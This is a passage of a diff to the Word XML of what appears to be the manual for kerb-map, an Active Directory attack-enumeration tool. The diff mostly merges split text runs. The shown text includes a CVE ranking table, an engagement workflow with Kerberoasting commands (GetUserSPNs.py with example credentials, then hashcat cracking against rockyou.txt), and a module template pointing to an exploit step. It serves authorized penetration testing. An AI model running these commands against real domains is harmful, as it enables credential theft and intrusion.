+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>1644</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>No</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>Certifried (CVE-2022-26923)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>LOW</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>1644</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>No</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>LDAP Signing check</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>LOW</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>1644</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2340" w:type="dxa"/>
+            <w:tcMar>
+              <w:top w:w="60" w:type="dxa"/>
+              <w:bottom w:w="60" w:type="dxa"/>
+              <w:left w:w="120" w:type="dxa"/>
+              <w:right w:w="120" w:type="dxa"/>
+            </w:tcMar>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="333333"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t>No</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
     </w:tbl>
     <w:p>
       <w:pPr>
@@ -18289,13 +17463,8 @@
         </w:pBdr>
       </w:pPr>
       <w:bookmarkStart w:id="51" w:name="_Toc224561331"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>9.2  Staying</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Quiet</w:t>
+      <w:r>
+        <w:t>9.2  Staying Quiet</w:t>
       </w:r>
       <w:bookmarkEnd w:id="51"/>
     </w:p>
@@ -18406,13 +17575,8 @@
         </w:pBdr>
       </w:pPr>
       <w:bookmarkStart w:id="52" w:name="_Toc224561332"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>9.3  The</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> RC4 Problem</w:t>
+      <w:r>
+        <w:t>9.3  The RC4 Problem</w:t>
       </w:r>
       <w:bookmarkEnd w:id="52"/>
     </w:p>
@@ -18484,59 +17648,8 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">GetUserSPNs.py </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>corp.local</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>/</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>jsmith:pass</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> -request-user svc_sql -enc-type aes256 -outputfile svc_</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>sql.hash</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
+              <w:t>GetUserSPNs.py corp.local/jsmith:pass -request-user svc_sql -enc-type aes256 -outputfile svc_sql.hash</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -18562,15 +17675,7 @@
       <w:bookmarkStart w:id="53" w:name="_Toc224561333"/>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>10</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>.  Typical</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Engagement Workflow</w:t>
+        <w:t>10.  Typical Engagement Workflow</w:t>
       </w:r>
       <w:bookmarkEnd w:id="53"/>
     </w:p>
@@ -18663,27 +17768,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">python kerb-map.py -d </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>corp.local</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> -dc 192.168.1.10 -u helpdesk01 -p Welcome2024!</w:t>
+              <w:t>python kerb-map.py -d corp.local -dc 192.168.1.10 -u helpdesk01 -p Welcome2024!</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -18766,21 +17851,7 @@
         <w:rPr>
           <w:color w:val="333333"/>
         </w:rPr>
-        <w:t>Rank 3: CVE-2021-42278/42287 (</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>noPac) —</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> MachineAccountQuota=10</w:t>
+        <w:t>Rank 3: CVE-2021-42278/42287 (noPac) — MachineAccountQuota=10</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -18892,59 +17963,8 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">GetUserSPNs.py </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>corp.local</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>/helpdesk</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>01:Welcome</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>2024! -request-user svc_sql -outputfile svc_</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>sql.hash</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
+              <w:t>GetUserSPNs.py corp.local/helpdesk01:Welcome2024! -request-user svc_sql -outputfile svc_sql.hash</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -19036,27 +18056,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>hashcat -m 13100 svc_</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>sql.hash</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> /usr/share/wordlists/rockyou.txt</w:t>
+              <w:t>hashcat -m 13100 svc_sql.hash /usr/share/wordlists/rockyou.txt</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -19140,27 +18140,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">python kerb-map.py -d </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>corp.local</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> -dc 192.168.1.10 -u svc_sql -p CrackedPass! --cves -o json</w:t>
+              <w:t>python kerb-map.py -d corp.local -dc 192.168.1.10 -u svc_sql -p CrackedPass! --cves -o json</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -19218,15 +18198,7 @@
       <w:bookmarkStart w:id="59" w:name="_Toc224561339"/>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>11</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>.  Project</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Structure</w:t>
+        <w:t>11.  Project Structure</w:t>
       </w:r>
       <w:bookmarkEnd w:id="59"/>
     </w:p>
@@ -20077,15 +19049,7 @@
       <w:bookmarkStart w:id="60" w:name="_Toc224561340"/>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">12. </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t xml:space="preserve"> Extending</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> kerb-map</w:t>
+        <w:t>12.  Extending kerb-map</w:t>
       </w:r>
       <w:bookmarkEnd w:id="60"/>
     </w:p>
@@ -20097,13 +19061,8 @@
         </w:pBdr>
       </w:pPr>
       <w:bookmarkStart w:id="61" w:name="_Toc224561341"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>12.1  Adding</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> a New CVE Module</w:t>
+      <w:r>
+        <w:t>12.1  Adding a New CVE Module</w:t>
       </w:r>
       <w:bookmarkEnd w:id="61"/>
     </w:p>
@@ -20147,21 +19106,7 @@
         <w:rPr>
           <w:color w:val="333333"/>
         </w:rPr>
-        <w:t xml:space="preserve">Inherit from CVEBase, implement the </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>check(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>) method, return a CVEResult</w:t>
+        <w:t>Inherit from CVEBase, implement the check() method, return a CVEResult</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -20307,27 +19252,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">class </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>MyCVE(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>CVEBase):</w:t>
+              <w:t>class MyCVE(CVEBase):</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -20482,47 +19407,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">        vulnerable = </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>self._</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>my_detection_</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>logic(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>)</w:t>
+              <w:t xml:space="preserve">        vulnerable = self._my_detection_logic()</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -20553,19 +19438,8 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">        return </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>CVEResult(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
+              <w:t xml:space="preserve">        return CVEResult(</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -20688,47 +19562,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">            evidence</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>={</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>'key': '</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>value'}</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>,</w:t>
+              <w:t xml:space="preserve">            evidence={'key': 'value'},</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -20790,27 +19624,7 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve">            next_step='exploit_cmd.py ...' if vulnerable </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>else ''</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:color w:val="A8D8EA"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>,</w:t>
+              <w:t xml:space="preserve">            next_step='exploit_cmd.py ...' if vulnerable else '',</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -20863,13 +19677,8 @@
         </w:pBdr>
       </w:pPr>
       <w:bookmarkStart w:id="62" w:name="_Toc224561342"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>12.2  Adding</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> a New Enumeration Module</w:t>
+      <w:r>
+        <w:t>12.2  Adding a New Enumeration Module</w:t>
       </w:r>
       <w:bookmarkEnd w:id="62"/>
     </w:p>
@@ -20881,35 +19690,7 @@
         <w:rPr>
           <w:color w:val="333333"/>
         </w:rPr>
-        <w:t xml:space="preserve">Create a new .py file in kerb_map/modules/. The module receives an LDAPClient instance and should expose a single primary method (e.g. </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>scan(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t xml:space="preserve">) or </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>enumerate(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>)) that returns a list or dict. Import it in kerb-map.py and plug it into the scan flow and the scorer.</w:t>
+        <w:t>Create a new .py file in kerb_map/modules/. The module receives an LDAPClient instance and should expose a single primary method (e.g. scan() or enumerate()) that returns a list or dict. Import it in kerb-map.py and plug it into the scan flow and the scorer.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -20928,13 +19709,8 @@
         </w:pBdr>
       </w:pPr>
       <w:bookmarkStart w:id="63" w:name="_Toc224561343"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>12.3  Customising</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> the Scorer</w:t>
+      <w:r>
+        <w:t>12.3  Customising the Scorer</w:t>
       </w:r>
       <w:bookmarkEnd w:id="63"/>
     </w:p>
@@ -20946,21 +19722,7 @@
         <w:rPr>
           <w:color w:val="333333"/>
         </w:rPr>
-        <w:t xml:space="preserve">The scorer in kerb_map/modules/scorer.py is straightforward to extend. Each finding type is a dictionary appended to the targets list with keys: target, attack, priority (0-100), severity, reason, next_step, category. Add additional finding types by inserting a new block in the </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>rank(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="333333"/>
-        </w:rPr>
-        <w:t>) method.</w:t>
+        <w:t>The scorer in kerb_map/modules/scorer.py is straightforward to extend. Each finding type is a dictionary appended to the targets list with keys: target, attack, priority (0-100), severity, reason, next_step, category. Add additional finding types by inserting a new block in the rank() method.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -20983,15 +19745,7 @@
       <w:bookmarkStart w:id="64" w:name="_Toc224561344"/>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>13</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>.  Legal</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Disclaimer</w:t>
+        <w:t>13.  Legal Disclaimer</w:t>
       </w:r>
       <w:bookmarkEnd w:id="64"/>
     </w:p>
@@ -21083,23 +19837,7 @@
                 <w:sz w:val="20"/>
                 <w:szCs w:val="20"/>
               </w:rPr>
-              <w:t xml:space="preserve">kerb-map is designed exclusively for use in </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="333333"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t>authorized</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="333333"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> security assessments, penetration testing engagements, and red team operations where written permission has been obtained from the system owner.</w:t>
+              <w:t>kerb-map is designed exclusively for use in authorized security assessments, penetration testing engagements, and red team operations where written permission has been obtained from the system owner.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -21191,29 +19929,7 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">kerb-map </w:t>
